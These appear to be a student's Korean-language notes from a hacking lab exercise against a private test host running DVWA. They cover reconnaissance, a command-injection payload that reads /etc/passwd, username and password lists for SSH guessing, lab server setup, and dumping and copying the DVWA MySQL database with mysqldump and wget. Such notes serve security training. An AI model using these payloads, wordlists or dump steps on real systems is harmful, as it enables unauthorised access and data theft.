미션1
victim.jeonjucom.kr 를 공격하시오
정보수집 후 사이트에 접속하시오
퀴즈
victim.jeonjucom.kr 의 ip는 무엇인가?192.168.0.126
열려있는 포트는 무엇인가?80
웹 애플리케이션이 취약함
admin password
서버에 등록된 사용자는 몇명인가?
127.0.0.1
; cat /etc/passwd (1000번대가 사용자다)
user.txt
alice
bee
ftp
johnny
neo
selene
thor
wolverine

passwd.txt
1qaz3edc
2wsx4rfv
3edc5tgb
2wsx6yhn
1qaz2wsx
5tgb6yhn
7ujm8ik,
3edc8ik,
9ol.4rfv

ssh bee@192.168.0.126
1qaz2wsx

시스템에 접속할 수 있는가? (계정을 알수가 없다)

미션2
윈도우10에서 3대서버로 접속할 수 있도록 설정후
웹 브라우저와 Editplus 로 접속하시오
st.kr
Editplus로 사이트 접속
포트
22,80,21,53,443,143,25,3306
53만 UDP로

nano /etc/bind/st.kr.zone
192.168.0.210으로 변경
systemctl restart bind9
dns 변경

editplus ftp설정 고급옵션 passive FTP모드 체크 풀기

db들어가는법
root로들어가서 mysql

미션3
192.168.0.126 222
mysql -u root -p
bug

show databases;
use dvwa
show tables;
desc users;
select * from users;

mysqldump -u root -p dvwa > dvwa.sql (db다 가져오기)
wget 192.168.0.126/dvwa.sql
mysql -u st -p st < dvwa.sql
mysql -u st -p

MySQLi(object-oriented)
MySQLi(procedual)
PDO